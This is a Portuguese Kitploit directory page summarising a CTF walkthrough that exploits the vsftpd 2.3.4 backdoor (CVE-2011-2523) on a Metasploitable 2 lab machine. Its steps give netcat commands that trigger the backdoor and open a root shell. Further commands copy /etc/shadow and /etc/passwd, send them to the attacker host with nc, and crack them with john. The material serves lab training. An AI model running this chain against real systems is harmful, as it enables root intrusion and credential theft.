Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/xiangsi-howard/ctf---cve-2011-2523
Quebra de SenhasReconhecimentoAnálise de VulnerabilidadesExploraçãoColeta de InformaçõesCTFTestes de PenetraçãoAprendizado e Educação

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
GitHub
xiangsi-howard/ctf---cve-2011-2523

CTF---CVE-2011-2523

Passo a passo de walkthrough de CTF explorando o backdoor do vsftpd 2.3.4 (CVE-2011-2523) para capturar e quebrar /etc/shadow e /etc/passwd do Metasploitable 2.

Ver Repositório
4há 3 anosAinda não revisado

Cenário Capture the Flag - CVE-2011-2523

Capture o arquivo descriptografado /etc/shadow e /etc/passwd do servidor vulnerável Metasploitable 2.

Configuração do Ambiente

Passo 1: Baixar e descompactar a máquina virtual

Para este CTF, utilizamos o VMware Workstation Pro com duas máquinas virtuais. Usamos o Kali Linux como máquina atacante e o Metasploitable 2 como máquina vulnerável.

  • Baixar e instalar o VMware Workstation: https://www.vmware.com/products/workstation-player/workstation-player-evaluation.html
  • Baixar e extrair a máquina virtual Kali Linux: https://www.kali.org/get-kali/
  • Baixar e extrair a máquina virtual Metasploitable 2: https://sourceforge.net/projects/metasploitable/files/Metasploitable2/

Passo 2: Abrir as máquinas virtuais Kali Linux e Metasploitable 2 no VMware a partir do arquivo extraído

  • Escolher a opção Open a Virtual Machine no VMware Workstation e selecionar o arquivo descompactado do Kali Linux
  • Clicar com o botão direito na barra deslizante e selecionar a opção open, depois selecionar o arquivo descompactado do Metasploitable 2
  • Pressionar o botão Play virtual machine em ambas as máquinas virtuais
  • Quando for solicitado a selecionar a opção I moved It ou I copied It, selecionar a opção I copied It

Passo 3: Login

  • Fazer login no Kali Linux usando kali como nome de usuário e senha
  • Fazer login no Metasploitable usando msfadmin como nome de usuário e senha

Passo 4: Registrar o endereço IP da máquina virtual Metasploitable

  • Executar ip addr show e registrar o endereço IP da seção inet

Solução

O Massachusetts Institute of Technology Research and Engineering detalha o CVE-2011-2523 como uma vulnerabilidade e exposição comum onde vsftpd 2.3.4 downloaded between 20110630 and 20110703 contains a backdoor which opens a shell on port 6200/tcp.

Passo 1: Procurar portas abertas na máquina Metasploitable usando o serviço FTP

  • nmap <vulnerable-machine-ip-address>
  • A varredura nmap deve mostrar uma porta aberta na porta 21 usando o serviço ftp

Passo 2: Tentar usar NetCat na porta aberta

  • nc <vulnerable-machine-ip-address> 21
  • O nome de usuário é qualquer string com :) no final, digite user <string>:)
  • Quando solicitado a senha, digite qualquer string pass <string>
  • Em seguida, saia da conexão usando ^C [CTRL + C], um shell como root para o Metasploitable foi aberto na porta 6200.

Passo 3: Conectar-se ao shell na porta 6200 da máquina vulnerável

  • nc -v <vulnerable-machine-ip-address> 6200
  • Mostrar o endereço IP da conexão atual ip addr show
  • Mostrar que o acesso root foi concedido usando whoami

Passo 4: Copiar os arquivos /etc/shadow e /etc/passwd para outro arquivo

  • cp /etc/shadow shadow.txt
  • cp /etc/passwd passwd.txt

Passo 5: Enviar os arquivos copiados para a máquina Kali Linux usando NetCat

  • Na máquina atacante, consulte o endereço IP em inet usando o comando ip addr show
  • Escute por arquivos usando nc -l -p 1234 > shadow.txt na máquina atacante
  • No shell root no Metasploitable nc -w 3 <destination-ip> 1234 < shadow.txt
  • Repita para o arquivo passwd

Passo 5: Formatando o arquivo shadow no formato da ferramenta John

  • unshadow passwd.txt shadow.txt > unshadowed-input
  • Observe o arquivo usando cat unshadowed-input, deve conter nome de usuário e senha armazenados

Passo 6: Descriptografar o arquivo shadow usando o comando John e uma wordlist

  • Utilize a wordlist rockyou.txt para quebrar hashes usando john
  • Descompacte o arquivo wordlist no Kali Linux usando sudo gzip -d /usr/share/wordlists/rockyou.txt.gz
  • Quando solicitado uma senha, use a senha de administrador padrão do Kali Linux kali
  • Desfaça o hash das senhas usando john unshadowed-input –wordlist=/usr/share/wordlists/rockyou.txt
  • Veja as senhas quebradas john –show unshadowed-input
Baixar ferramenta